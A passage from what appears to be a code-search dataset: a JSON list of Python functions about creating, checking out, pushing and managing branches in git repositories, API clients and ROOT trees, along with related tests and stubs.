RestaurantBranch\r\n\tbranch = RestaurantBranch.objects.get(id=branch_id)\r\n\tpost, _ = BranchComment.objects.get_or_create(branch=branch, user=user)\r\n\tpost.comment = comment\r\n\tpost.save()", "def branch(name, wit_path):\n\n if name != 'None':\n\n if len(name) < 30:\n head = _get_head(wit_path)\n _add_branch(wit_path, name, head)\n else:\n logging.error(f'branch name is too long \"{name}\" (max 30 digits).')\n else:\n logging.error(f'branch name is not valid {name}.')", "def __gitStashBranch(self):\n pfile = self.project.getProjectFile()\n lastModified = QFileInfo(pfile).lastModified().toString()\n shouldReopen = (\n self.vcs.gitStashBranch(self.project.getProjectPath()) or\n QFileInfo(pfile).lastModified().toString() != lastModified\n )\n if shouldReopen:\n res = E5MessageBox.yesNo(\n self.parent(),\n self.tr(\"Create Branch\"),\n self.tr(\"\"\"The project should be reread. 
Do this now?\"\"\"),\n yesDefault=True)\n if res:\n self.project.reopenProject()", "def create(\n self,\n kind,\n branch_match_kind=\"glob\",\n branch_pattern=\"*\",\n branch_type=None,\n users=None,\n groups=None,\n value=None,\n ):\n if branch_match_kind == \"branching_model\":\n branch_pattern = \"\"\n\n data = {\n \"kind\": kind,\n \"branch_match_kind\": branch_match_kind,\n \"pattern\": branch_pattern,\n }\n\n if branch_match_kind == \"branching_model\":\n data[\"branch_type\"] = branch_type\n\n if users is not None:\n data[\"users\"] = users\n\n if groups is not None:\n data[\"groups\"] = groups\n\n if value is not None:\n data[\"value\"] = value\n\n return self.__get_object(self.post(None, data=data))", "def test_instantiate_branch_node(self):\n try:\n BranchNode('my_name')\n except Exception:\n message = \"BranchNode instantiation failed\"\n self.fail(message)", "def branch(self, *arguments, **kwargs):\n return self.get_output('branch', *arguments, **kwargs)", "def add_branch(self, info):\n if not isinstance(info, list):\n raise TypeError(\"Argument enclosing new AC line(s) must be a list\")\n self._add_line(\"new_branch\", info)", "def cmd_create(self):\n self.repo.create()\n\n # Add .gitignore.\n self.repo.add_files({'.gitignore': '.swp\\n'}, FIRST_COMMIT_MSG)\n\n # Create the etc and timestamps branches.\n self.repo.checkout('etc', create=True)\n self.repo.checkout('timestamps', create=True)\n\n self.repo.checkout('master')\n self.repo.init()\n self.update_repository()\n print('Git repository created at %s' % self.repodir)", "def add_branch(self, branch):\n self.branch.append(branch)", "def _assign_branches(ctx, prl):\n heads = prl.set_heads\n if not heads:\n return None\n branch_dict = ctx.branch_dict()\n LOG.debug2('allowing branch creation: %s', ctx.branch_creation)\n # Assign branches to each of the received commits for pushed branches\n assigner = Assigner(branch_dict, heads, ctx)\n assigner.assign()\n return assigner", "def do_bay_create(cs, args):\n baymodel = cs.baymodels.get(args.baymodel)\n\n opts = {}\n opts['name'] = args.name\n opts['baymodel_id'] = baymodel.uuid\n opts['node_count'] = args.node_count\n opts['master_count'] = args.master_count\n opts['discovery_url'] = args.discovery_url\n opts['bay_create_timeout'] = args.timeout\n try:\n bay = cs.bays.create(**opts)\n # support for non-async in 1.1\n if args.magnum_api_version and args.magnum_api_version == '1.1':\n _show_bay(bay)\n else:\n uuid = str(bay._info['uuid'])\n print(\"Request to create bay %s has been accepted.\" % uuid)\n except Exception as e:\n print(\"Create for bay %s failed: %s\" %\n (opts['name'], e))", "def create(\n self,\n title,\n source_branch,\n destination_branch=None,\n description=None,\n close_source_branch=None,\n reviewers=None,\n ):\n\n rv = [{\"uuid\": x} for x in reviewers] if reviewers else []\n data = {\n \"title\": title,\n \"source\": {\"branch\": {\"name\": source_branch}},\n \"description\": description,\n \"close_source_branch\": close_source_branch,\n \"reviewers\": rv,\n }\n if destination_branch:\n data[\"destination\"] = {\"branch\": {\"name\": destination_branch}}\n\n return self.__get_object(self.post(None, data))", "def create_clowder_repo(self, url, branch, depth=0):\n\n if self.existing_git_repository(self.repo_path):\n return\n self._init_repo()\n self._create_remote(self.remote, url, remove_dir=True)\n self._checkout_new_repo_branch(branch, depth)", "def test_worktree_creates_worktree(repository: Repository) -> None:\n branch = 
repository.heads.create(\"branch\")\n\n with repository.worktree(branch) as worktree:\n assert (worktree.path / \".git\").is_file()", "def __branch_factory(self, action, task_activities):\n branches = action.findall(\"./branches_Branch\")\n for branch in branches:\n branch_type = get_branch_type(branch=branch)\n if \"probabilistic\" == branch_type:\n return self.__add_probabilistic_branch(action=action, task_activities=self.task_activities)\n elif \"type\" == branch_type:\n return self.__add_type_branch(action=action, task_activities=task_activities)\n elif \"detailed\" == branch_type:\n return self.__add_detailed_branch(action=action, task_activities=task_activities)\n elif \"simple\" == branch_type:\n return self.__add_simple_branch(action=self.action, task_activities=self.task_activities)\n else:\n raise ValueError(\"Unknown branch_type. Abort Mission.\")", "def test_heads_create_default_commit(repository: Repository) -> None:\n branch = repository.heads.create(\"branch\")\n assert branch.commit == repository.head.commit", "def test_branching(self):\r\n repo_dir = self.GIT_REPO_DIR\r\n # Test successful import from command\r\n if not os.path.isdir(repo_dir):\r\n os.mkdir(repo_dir)\r\n self.addCleanup(shutil.rmtree, repo_dir)\r\n\r\n # Checkout non existent branch\r\n with self.assertRaisesRegexp(GitImportError, GitImportError.REMOTE_BRANCH_MISSING):\r\n git_import.add_repo(self.TEST_REPO, repo_dir / 'edx4edx_lite', 'asdfasdfasdf')\r\n\r\n # Checkout new branch\r\n git_import.add_repo(self.TEST_REPO,\r\n repo_dir / 'edx4edx_lite',\r\n self.TEST_BRANCH)\r\n def_ms = modulestore()\r\n # Validate that it is different than master\r\n self.assertIsNotNone(def_ms.get_course(self.TEST_BRANCH_COURSE))\r\n\r\n # Attempt to check out the same branch again to validate branch choosing\r\n # works\r\n git_import.add_repo(self.TEST_REPO,\r\n repo_dir / 'edx4edx_lite',\r\n self.TEST_BRANCH)\r\n\r\n # Delete to test branching back to master\r\n delete_course(def_ms, contentstore(),\r\n self.TEST_BRANCH_COURSE,\r\n True)\r\n self.assertIsNone(def_ms.get_course(self.TEST_BRANCH_COURSE))\r\n git_import.add_repo(self.TEST_REPO,\r\n repo_dir / 'edx4edx_lite',\r\n 'master')\r\n self.assertIsNone(def_ms.get_course(self.TEST_BRANCH_COURSE))\r\n self.assertIsNotNone(def_ms.get_course(SlashSeparatedCourseKey.from_deprecated_string(self.TEST_COURSE)))", "def free_branch(allow_create=False, str_if_none=False):\n repo = git.repo()\n current_branch = repo.current_branch()\n result = None\n if current_branch:\n if not is_nice_branch(current_branch):\n result = current_branch\n else:\n proposed_branch = re.sub( nice_branch_regex, \"\", current_branch)\n if not repo.has_branch(proposed_branch):\n if allow_create:\n result = proposed_branch\n repo.create_branch(proposed_branch,startpoint=remote_branch())\n else:\n result = proposed_branch\n if not result and str_if_none:\n result = no_branch\n return result", "def cmd_change_branch(branch, new=False):\n cmd = ['git', 'checkout']\n\n if new:\n cmd.append('-b')\n\n cmd.append(branch)\n\n return cmd", "def start(self, remote, branch, depth, tracking):\n\n if branch not in self.repo.heads:\n if not is_offline():\n return_code = self.fetch(remote, ref=branch, depth=depth)\n if return_code != 0:\n sys.exit(1)\n return_code = self._create_branch_local(branch)\n if return_code != 0:\n self._exit('', return_code=return_code)\n return_code = self._checkout_branch_local(branch)\n if return_code != 0:\n self._exit('', return_code=return_code)\n else:\n branch_output = 
fmt.ref_string(branch)\n print(' - ' + branch_output + ' already exists')\n correct_branch = self._is_branch_checked_out(branch)\n if correct_branch:\n print(' - On correct branch')\n else:\n return_code = self._checkout_branch_local(branch)\n if return_code != 0:\n self._exit('', return_code=return_code)\n if tracking and not is_offline():\n self._create_branch_remote_tracking(branch, remote, depth)", "def add_branch(self, branch, pidx=None, random_color=True):\n if random_color:\n rand_node_type = randrange(6, 257)\n\n new_branch = np.zeros((len(branch.pts), 8))\n id_start = 1 if self._data.shape[0] == 1 else self._data[:, 0].max() + 1\n\n for i in range(len(branch.pts)):\n p, r, c = branch.pts[i], branch.radius[i], branch.conf[i]\n id = id_start + i\n # 3 for basal dendrite; 4 for apical dendrite;\n # However now we cannot differentiate them automatically\n nodetype = 3\n\n if i == len(branch.pts) - 1: # The end of this branch\n pid = self._data[pidx, 0] if pidx is not None else -2\n if pid != -2 and pid != 0 and self._data.shape[0] != 1:\n # Its connected node is fork point\n self._data[self._data[:, 0] == pid, 1] = 5\n else:\n pid = id_start + i + 1\n if i == 0:\n nodetype = 6 # Endpoint\n\n assert pid != id\n new_branch[i] = np.asarray(\n [\n id,\n rand_node_type if random_color else nodetype,\n p[0],\n p[1],\n p[2],\n r,\n pid,\n c,\n ]\n )\n\n # Check if any tail should be connected to its tail\n tail = new_branch[0]\n matched, minidx = self.match(tail[2:5], tail[5])\n if matched and self._data[minidx, 6] == -2:\n self._data[minidx, 6] = tail[0]\n\n self._data = np.vstack((self._data, new_branch))", "def repo_new(request):\n if request.method != 'POST':\n form = RepoForm()\n return respond(request, 'repo_new.html', {'form': form})\n form = RepoForm(request.POST)\n errors = form.errors\n if not errors:\n try:\n repo = models.Repository(\n name=form.cleaned_data.get('name'),\n url=form.cleaned_data.get('url'),\n guid=form.cleaned_data.get('guid'),\n )\n except (db.BadValueError, ValueError) as err:\n errors['__all__'] = unicode(err)\n if errors:\n return respond(request, 'repo_new.html', {'form': form})\n repo.put()\n branch_url = repo.url\n if not branch_url.endswith('/'):\n branch_url += '/'\n branch_url += 'trunk/'\n branch = models.Branch(repo_key=repo.key, repo_name=repo.name,\n category='*trunk*', name='Trunk',\n url=branch_url)\n branch.put()\n return HttpResponseRedirect(reverse(repos))", "def branch(self, name: str) -> GitRef:\n _args = [\n Arg(\"name\", name),\n ]\n _ctx = self._select(\"branch\", _args)\n return GitRef(_ctx)", "def _create_checkout(self):\n parent_git_dir = os.path.join(self._parent_repo, self._run_git_command(\n ['rev-parse', '--git-dir']).strip())\n self._workdir = tempfile.mkdtemp(prefix='drover_%s_' % self._branch)\n logging.debug('Creating checkout in %s', self._workdir)\n git_dir = os.path.join(self._workdir, '.git')\n git_common.make_workdir_common(parent_git_dir, git_dir, self.FILES_TO_LINK,\n self.FILES_TO_COPY, mk_symlink)\n self._run_git_command(['config', 'core.sparsecheckout', 'true'])\n with open(os.path.join(git_dir, 'info', 'sparse-checkout'), 'w') as f:\n f.write('/codereview.settings')\n\n branch_name = os.path.split(self._workdir)[-1]\n self._run_git_command(['checkout', '-b', branch_name, self._branch_ref])\n self._branch_name = branch_name", "def create_release(ctx):\n # Get the head of master\n r = _get_repo()\n b = r.get_branch(branch=\"master\")\n head = b.commit\n\n faasm_ver = get_faasm_version()\n\n # Create a tag from the head\n 
tag_name = _tag_name(faasm_ver)\n r.create_git_tag(\n tag_name,\n \"Release {}\\n\".format(faasm_ver),\n head.sha,\n \"commit\",\n )\n\n r.create_git_release(\n tag_name,\n \"Faasm {}\".format(faasm_ver),\n \"Release {}\\n\".format(faasm_ver),\n draft=True\n )", "def add_branch(self, branch: SourceBranch) -> None:\n branch_id = branch.id_\n if branch_id in self.branches:\n self.branches[branch_id].combine(branch)\n else:\n self.branches[branch_id] = branch", "def add_branch_to_TTree(tree, br):\n ptr = array('f', [0.])\n tree.Branch(br, ptr, \"%s/F\" % br)\n return ptr", "def push_latest_branch (product, which, main_branch):\n\n name = \"Latest_ACE7TAO3_\" + which\n\n if opts.push:\n vprint (\"Pushing branch\", name)\n ex (\"cd $DOC_ROOT/\" + product + \" && git push origin refs/heads/\" + name,\n allow_fail=True)", "def new_branch_tree(tree, ids):\n branch_tree = {}\n branch_tree[\"selftext\"] = tree[\"selftext\"]\n branch_tree[\"title\"] = tree[\"title\"]\n branch_tree[\"id\"] = tree[\"id\"]\n branch_tree[\"comments\"] = {}\n for id in ids[1:]:\n branch_tree[\"comments\"][id] = tree[\"comments\"][id]\n return branch_tree", "def create():", "def create():", "def push(self, remote, branch, *args):\n return self.cmd('push', remote, branch, *args)", "def install_branch(branch):\n\n # if it's already in the virtualenv, remove it\n ver = '.'.join(map(str,(sys.version_info.major,sys.version_info.minor)))\n sitepack = os.path.join(virtual_dir, 'lib','python'+ver, 'site-packages')\n if os.path.exists(sitepack):\n dir_list = os.listdir(sitepack)\n else:\n dir_list = []\n for f in dir_list:\n if 'statsmodels' in f:\n shutil.rmtree(os.path.join(sitepack, f))\n\n # checkout the branch\n os.chdir(gitdname)\n retcode = subprocess.call('git checkout ' + branch, shell=True)\n if retcode != 0:\n msg = \"\"\"Could not checkout out branch %s\"\"\" % branch\n raise Exception(msg)\n\n # build and install\n retcode = subprocess.call(\" \".join([virtual_python, 'setup.py', 'build']),\n shell=True)\n if retcode != 0:\n msg = \"\"\" Could not build branch %s\"\"\" % branch\n raise Exception(msg)\n retcode = subprocess.call(\" \".join([virtual_python, os.path.join(gitdname,\n 'setup.py'), 'install']), shell=True)\n if retcode != 0:\n os.chdir(dname)\n msg = \"\"\"Could not install branch %s\"\"\" % branch\n raise Exception(msg)\n os.chdir(dname)", "def create():\n pass", "def addBranch(self, value, node):\n self.branches[value] = node", "def create_new_banks():\n\n\tcity = request.form.get('bankCity', '')\n\tname = request.form.get('bankName', '')\n\taddress = request.form.get('bankAddress', '')\n\tinfo = dict(city=city, name=name, address=address)\n\t# print(info)\n\tbank = Bank(city, name, address)\n\tres = bank.save()\n\t# print('res=%d' % res)\n\treturn send_result(info, res, status=\"True\")", "def add_branch(mb, k, l):\n return _RNAstructure_wrap.add_branch(mb, k, l)", "def create_label(self, repository, name, color, **kwargs):\n data = {'name': name, 'color': color}\n response = self.session.post(\n '{}/repos/{}/labels'.format(self.GH_API_ENDPOINT, repository),\n json=data\n )\n if response.status_code != 201:\n raise GitHubError(response)", "def switchToBranch(self):\n branches = self._listBranches()\n if not branches:\n raise error.ExpectationFailed(\n 'No branches available. 
Please import one.')\n\n choice = io.getChoice('Available release branches:',\n 'Your choice?',\n branches,\n suggest=len(branches)-1)\n self._switchBranch(branches[choice])", "def branch(self, node, formula = None):\n print(f\"Branching on node {node.node_id}\")\n child_node_id1 = len(self.nodes)\n child_node_id2 = len(self.nodes)+1\n child_node1 = node.add_child(child_node_id1, len(self.node_memory))\n child_node2 = node.add_child(child_node_id2, len(self.node_memory)+1)\n print(f\"Adding nodes {child_node_id1} and {child_node_id2}\")\n self.nodes.append(child_node1)\n self.nodes.append(child_node2)\n self.node_memory.append(child_node1)\n self.node_memory.append(child_node2)\n child_node1.parent_formula = formula\n child_node2.parent_formula = formula\n formula.node_children.append(child_node1)\n formula.node_children.append(child_node2)", "def branch(self, name=None, clean=None, force=None):\n\n if name and clean:\n raise ValueError('Cannot use both name and clean')\n\n self._client.execute('branch', name, f=force, C=clean)\n\n if name:\n return name\n elif not clean:\n return out.strip()\n else:\n return out[len('reset working directory to branch '):]", "def git_branch(self, app, branch):\n if app == self.PROJECT_NAME:\n app_path = self.PROJECT_DIR\n else:\n raise ValueError('Unknown app')\n\n with lcd(app_path):\n self.local('git pull && git checkout %s' % branch)\n\n self.display('%s has been successfully switched to tag/branch %s.' % (app, branch), color='green')", "def create(ctx):\n pass", "def create(title, head, base='master', message=''):\n review_info = {\n 'title': title,\n 'body': message,\n 'head': head,\n 'base': base,\n }\n\n data = json_encode(review_info)\n review = parse(gh_request('POST', '/repos/:user/:repo/pulls', body=data))\n printers.print_review_created(review)", "def create_branch(self, gui_id):\n if gui_id not in self.SMGData.keys():\n self.SMGData[gui_id] = dict()\n self.SMGData[gui_id]['Mask'] = None\n self.SMGData[gui_id]['gMuns'] = None\n self.SMGData[gui_id]['phaseraw'] = None\n self.SMGData[gui_id]['deltagM'] = None\n self.SMGData[gui_id]['phasegM'] = None\n self.SMGData[gui_id]['shiftg'] = None\n self.SMGData[gui_id]['gCuns'] = None\n else:\n raise Exception('Key gui_id already exists, branch creation aborted')", "def create_builds(self):\n branches = self.search([('use_in_ci', '=', True)])\n branches.create_build()\n return True", "def create(self, *args, **kwargs):\n pass", "def _add_branch(wit_path, name, head):\n\n with open(os.path.join(wit_path, '.wit', 'references.txt'), 'a') as data:\n data.write(''.join(f'\\n{name}={head}'))", "def test_create_experiment_hit_branch(self):\n with OrionState(experiments=[config]) as cfg:\n experiment = create_experiment(\n config[\"name\"],\n space={\"y\": \"uniform(0, 10)\"},\n branching={\"enable\": True},\n storage=cfg.storage_config,\n )\n\n assert experiment.name == config[\"name\"]\n assert experiment.version == 2\n assert experiment.algorithm\n assert experiment.algorithm.configuration == config[\"algorithm\"]\n assert experiment.max_trials == config[\"max_trials\"]\n assert experiment.max_broken == config[\"max_broken\"]\n assert experiment.working_dir == config[\"working_dir\"]", "def create_branches(branches, pcoll, provider_options):\n\n logger.info('Branch count: %i' % len(branches))\n pcoll_tuple = ()\n\n for branch in branches:\n logger.info('Adding branch')\n output = create_graph(branch, pcoll, provider_options)\n pcoll_tuple = pcoll_tuple + (output,)\n\n logger.info('Transform: MergeBranches')\n 
output = pcoll_tuple | 'MergeBranches' >> MergeBranches()\n return output", "def branch(self, current_path):\n p = subprocess.Popen(\n [\"git\", \"show-ref\"],\n stdout=PIPE,\n stderr=PIPE,\n cwd=os.path.join(self.root_dir, current_path),\n )\n output, error = p.communicate()\n if p.returncode == 0:\n results = []\n try:\n current_branch = self.get_current_branch(current_path)\n for line in output.decode(\"utf-8\").splitlines():\n # The format for git show-ref is '<SHA-1 ID> <space> <reference name>'\n # For this method we are only interested in reference name.\n # Reference : https://git-scm.com/docs/git-show-ref#_output\n commit_sha = line.strip().split()[0].strip()\n reference_name = line.strip().split()[1].strip()\n if self._is_branch(reference_name):\n branch_name = self._get_branch_name(reference_name)\n is_current_branch = self._is_current_branch(\n branch_name, current_branch\n )\n is_remote_branch = self._is_remote_branch(reference_name)\n upstream_branch_name = None\n if not is_remote_branch:\n upstream_branch_name = self.get_upstream_branch(\n current_path, branch_name\n )\n tag = self._get_tag(current_path, commit_sha)\n results.append(\n {\n \"is_current_branch\": is_current_branch,\n \"is_remote_branch\": is_remote_branch,\n \"name\": branch_name,\n \"upstream\": upstream_branch_name,\n \"top_commit\": commit_sha,\n \"tag\": tag,\n }\n )\n\n # Remote branch is seleted use 'git branch -a' as fallback machanism\n # to get add detached head on remote branch to preserve older functionality\n # TODO : Revisit this to checkout new local branch with same name as remote\n # when the remote branch is seleted, VS Code git does the same thing.\n if current_branch == \"HEAD\":\n results.append(\n {\n \"is_current_branch\": True,\n \"is_remote_branch\": False,\n \"name\": self._get_detached_head_name(current_path),\n \"upstream\": None,\n \"top_commit\": None,\n \"tag\": None,\n }\n )\n return {\"code\": p.returncode, \"branches\": results}\n except Exception as downstream_error:\n return {\n \"code\": p.returncode,\n \"command\": \"git show-ref\",\n \"message\": str(downstream_error),\n }\n else:\n return {\n \"code\": p.returncode,\n \"command\": \"git show-ref\",\n \"message\": error.decode(\"utf-8\"),\n }", "def gh_pages_branch(repo):\n repo.git.branch('gh-pages')\n repo.git.checkout('gh-pages')", "def __init__(self, git_repo_path: Path, git_repo_branch: str) -> None:\n self._repo: git.Repo = git.Repo(git_repo_path)\n self._branch: str = git_repo_branch\n if self._repo.head.ref.name != self._branch:\n for branch in self._repo.branches:\n if branch.name == self._branch:\n branch.checkout()\n break\n else:\n raise ValueError(\n f\"Branch {self._branch} doesn't exist in {self._repo.working_dir} repo\"\n )", "def __init__(self: \"DeleteBranchOperator\", conn_id: str = \"nessie_default\", branch: str = None, *args: Any, **kwargs: Any) -> None:\n super().__init__(*args, **kwargs)\n self.conn_id = conn_id\n if branch is None:\n raise Exception(\"Cannot have a null branch for commit operations\")\n self.branch = branch", "def create_board(self, board_id, comp):\n new_board = self.create_board_from_template(board_id)\n comp.answer(new_board.id)", "def add_new_branch(self, if_node):\n old_block = self.curr_block\n # First we create an explicit branch node\n self.curr_block = Branch(if_node)\n self.blocks.append(self.curr_block)\n add_edge(old_block, self.curr_block)\n branch = self.curr_block\n # Then we add a basic block for the true edge\n self.curr_block = self.gen_new_block()\n 
add_true_edge(branch, self.curr_block)\n # Note we add the block for the false edge later\n # TODO: This is confusing, can we make it simpler?\n return branch", "def create(self, comment):\r\n url = self.get_url()\r\n\r\n # when creating commits they don't get wrapped in {\"body\": <comment>}\r\n return http.Request('POST', url, params=comment), parsers.parse_json", "async def create_channel(self):\n self._logger.info(\"Deploying chaincode...\")\n network_file_path = os.path.join(os.getcwd(), \"network.json\")\n channel_config_path = os.path.join(self.config_path, \"channel-artifacts\", \"channel.tx\")\n\n self.fabric_client = Client(net_profile=network_file_path)\n\n org1_admin = self.fabric_client.get_user(org_name='org1.example.com', name='Admin')\n\n # Create a New Channel, the response should be true if succeed\n response = await self.fabric_client.channel_create(\n orderer='orderer1.example.com',\n channel_name='mychannel',\n requestor=org1_admin,\n config_tx=channel_config_path\n )\n self._logger.info(\"Result of channel creation: %s\", response)", "def make_commit(self, commit_message, branch_name) -> Commit:\n self.load_config()\n commit = Commit(commit_message)\n commit.branch_name = branch_name\n commit.init_config()\n branch = Branch.make_branch_from_config(branch_name)\n prev_commit = branch.get_current_commit()\n if prev_commit is not None:\n commit_number = prev_commit.commit_number\n commit.set_previous_commit_number(commit_number)\n commit.freeze_files(self.__indexed_files, self.__directory)\n self.__last_commit = commit\n self.config['info']['files'] = ''\n self.config['info']['last_commit'] = commit.commit_number\n self.config['info']['last_commit_branch'] = commit.branch_name\n self.save_config()\n return commit", "def post(self):\n try:\n request = self._create_borrow_node()\n #TODO Stop being lazy and return whole node\n br_id, user_id = self.borrow_repo.insert_one(request)\n self._send_notification(user_id)\n self.write({'id': br_id})\n except BumerangError as e:\n self.set_status(500)\n self.finish({'error': str(e)})", "def switch_branch(branch, rdir):\r\n # Get the latest remote\r\n try:\r\n cmd_log(['git', 'fetch', ], rdir)\r\n except subprocess.CalledProcessError as ex:\r\n log.exception('Unable to fetch remote: %r', ex.output)\r\n raise GitImportError(GitImportError.CANNOT_BRANCH)\r\n\r\n # Check if the branch is available from the remote.\r\n cmd = ['git', 'ls-remote', 'origin', '-h', 'refs/heads/{0}'.format(branch), ]\r\n try:\r\n output = cmd_log(cmd, rdir)\r\n except subprocess.CalledProcessError as ex:\r\n log.exception('Getting a list of remote branches failed: %r', ex.output)\r\n raise GitImportError(GitImportError.CANNOT_BRANCH)\r\n if not branch in output:\r\n raise GitImportError(GitImportError.REMOTE_BRANCH_MISSING)\r\n # Check it the remote branch has already been made locally\r\n cmd = ['git', 'branch', '-a', ]\r\n try:\r\n output = cmd_log(cmd, rdir)\r\n except subprocess.CalledProcessError as ex:\r\n log.exception('Getting a list of local branches failed: %r', ex.output)\r\n raise GitImportError(GitImportError.CANNOT_BRANCH)\r\n branches = []\r\n for line in output.split('\\n'):\r\n branches.append(line.replace('*', '').strip())\r\n\r\n if branch not in branches:\r\n # Checkout with -b since it is remote only\r\n cmd = ['git', 'checkout', '--force', '--track',\r\n '-b', branch, 'origin/{0}'.format(branch), ]\r\n try:\r\n cmd_log(cmd, rdir)\r\n except subprocess.CalledProcessError as ex:\r\n log.exception('Unable to checkout remote branch: %r', 
ex.output)\r\n raise GitImportError(GitImportError.CANNOT_BRANCH)\r\n # Go ahead and reset hard to the newest version of the branch now that we know\r\n # it is local.\r\n try:\r\n cmd_log(['git', 'reset', '--hard', 'origin/{0}'.format(branch), ], rdir)\r\n except subprocess.CalledProcessError as ex:\r\n log.exception('Unable to reset to branch: %r', ex.output)\r\n raise GitImportError(GitImportError.CANNOT_BRANCH)", "def Create(ctx,\n name,\n attributes = None):\n if ctx.element is None:\n ctx.logger.error(\"You must establish at least one connection and specify which you intend to use.\")\n exit()\n\n\n if(attributes is not None):\n kwargsDict = simplejson.loads(attributes)\n attributes = dict(**kwargsDict)\n\n ctx.logger.info(\"\"\"name = \"\"\"+str(name)+\"\"\";\"\"\"+\"\"\"attributes = \"\"\"+str(attributes)+\"\"\";\"\"\"+\"\")\n try:\n CreateBackupTargetResult = ctx.element.create_backup_target(name=name, attributes=attributes)\n except common.ApiServerError as e:\n ctx.logger.error(e.message)\n exit()\n except BaseException as e:\n ctx.logger.error(e.__str__())\n exit()\n\n cli_utils.print_result(CreateBackupTargetResult, ctx.logger, as_json=ctx.json, depth=ctx.depth, filter_tree=ctx.filter_tree)", "def create_trunk(self, trunk_id, port_id, port_mac):\n trunk = TrunkParentPort(trunk_id, port_id, port_mac)\n try:\n if not trunk.bridge.exists():\n raise exc.TrunkBridgeNotFound(bridge=trunk.bridge.br_name)\n trunk.plug(self.br_int)\n except RuntimeError as e:\n raise TrunkManagerError(error=e)", "def addBranch(self, name, dtype='f', default=None, standard=True):\n if hasattr(self,name):\n print \"ERROR! TreeProducerCommon.addBranch: Branch of name '%s' already exists!\"%(name)\n exit(1)\n if isinstance(dtype,str):\n if dtype.lower()=='f': # 'f' is only a 'float32', and 'F' is a 'complex64', which do not work for filling float branches\n dtype = float # float is a 'float64' ('f8')\n elif dtype.lower()=='i': # 'i' is only a 'int32'\n dtype = int # int is a 'int64' ('i8')\n if standard:\n setattr(self,name,num.zeros(1,dtype=dtype))\n self.Branch(name, getattr(self,name), '%s/%s'%(name,root_dtype[dtype]))\n if default!=None:\n getattr(self,name)[0] = default\n else:\n l = array('f', [0.])\n setattr(self,name,TObjArray(l))\n # self.Branch(name, getattr(self, name))\n print type(getattr(self, name))\n self.Branch(getattr(self, name))", "def push(self, base_repo, branch=\"master\"):\n base_repo.push_to(self, branch)", "def create_ref(self, commit_id=None):\n pass", "def svn_fs_create_berkeley(*args):\r\n return _fs.svn_fs_create_berkeley(*args)", "def create(self):\n pass", "def create(self):\n pass", "def create(self):\n pass", "def __add_simple_branch(self, action, task_activities):\n action_activity_name = create_activity_name_from_action(action=action)\n add_activity_to_task(task_activities=task_activities, activity_name=action_activity_name, hide_activity=True)\n\n post_or_element, stop_pre_or_tag = self.__add_pre_or_and_post_or(action=action,\n action_activity_name=action_activity_name,\n task_activities=task_activities)\n\n for branch in action.findall(\"./branches_Branch\"):\n branches_steps = branch.find(\"./branchBehaviour_BranchTransition\").findall(\".//steps_Behaviour\")\n branch_start_actions, final_successor_action = self.__get_final_successor_and_start(actions=branches_steps)\n # Create ActionFactory and add action\n self.__create_actions_for_all_branches(branches_steps, task_activities)\n\n branch_conditions = branch.findall(\".//branchCondition_GuardedBranchTransition\")\n 
for condition in branch_conditions:\n condition_types = self.__get_condition_types(condition)\n reference_name = self.__get_reference_name(condition_types=condition_types)\n variable_usage = get_element_by_identifier(attribute=\"referenceName\", search_string=reference_name,\n element_tree=self.xml_cache.get_xml_tree(\"usagemodel\"))\n\n for branch_start_action in branch_start_actions:\n parent = variable_usage.getparent()\n bool_exp = parent.find(\".//specification_VariableCharacterisation\").get(\"specification\")\n match_object = re.findall(r'true;+\\d\\.\\d*|false;+\\d\\.\\d*', bool_exp)\n # Get branch probability for post element\n branch_probability = \"0\"\n # First start action has false probability\n if \"NOT\" in condition_types:\n for matching_object in match_object:\n if \"false\" in matching_object:\n branch_probability = matching_object.split(\";\")[1]\n else:\n for matching_object in match_object:\n if \"true\" in matching_object:\n branch_probability = matching_object.split(\";\")[1]\n\n post_predecessor_activity_name = create_activity_name_from_action(action=branch_start_action)\n post_predecessor_activity = SubElement(post_or_element, 'activity')\n post_predecessor_activity.set(\"name\", post_predecessor_activity_name)\n post_predecessor_activity.set(\"prob\", branch_probability)\n\n self.__add_stop_action_precedences(final_successor_action, stop_pre_or_tag)", "def firmware_pack_create(handle, org_name, name, rack_bundle_version,\n blade_bundle_version, descr=\"\", mode=\"staged\",\n org_parent=\"org-root\"):\n\n org_dn = org_parent + \"/org-\" + org_name\n p_mo = handle.query_dn(org_dn)\n if not p_mo:\n log.info(\"Sub-Org <%s> not found!\" % org_name)\n else:\n from ucsmsdk.mometa.firmware.FirmwareComputeHostPack import\\\n FirmwareComputeHostPack\n\n mo = FirmwareComputeHostPack(parent_mo_or_dn=org_dn,\n name=name,\n descr=descr,\n rack_bundle_version=rack_bundle_version,\n mode=mode,\n blade_bundle_version=blade_bundle_version)\n handle.add_mo(mo)\n handle.commit()", "def _switchBranch(self, release):\n if release is None:\n self.branch = None\n self.branch_dir = None\n log.info('No release branch available')\n else:\n self.wc.update()\n assert self.wc.exists('branches/' + release)\n io.linesToFile(self.path(self.BRANCH_FILE), [release])\n self.branch = release\n self.branch_dir = 'branches/' + release\n self.wc.update(self.branch_dir, depth='infinity')\n log.info('Working on branch ' + self.branch)", "def create(self):\n ...", "def create(self):\n\n raise NotImplementedError", "def checkout_branch(self, branchname, current_path):\n p = Popen(\n [\"git\", \"checkout\", branchname],\n stdout=PIPE,\n stderr=PIPE,\n cwd=os.path.join(self.root_dir, current_path),\n )\n my_output, my_error = p.communicate()\n if p.returncode == 0:\n return {\"code\": p.returncode, \"message\": my_output.decode(\"utf-8\")}\n else:\n return {\n \"code\": p.returncode,\n \"command\": \"git checkout \" + branchname,\n \"message\": my_error.decode(\"utf-8\"),\n }", "def create_stack(self, stack, template, parameters):\n self.cfn.create_stack(StackName=stack, TemplateBody=template, Parameters=parameters)\n waiter = self.cfn.get_waiter('stack_create_complete')\n waiter.wait(StackName=stack)" ]
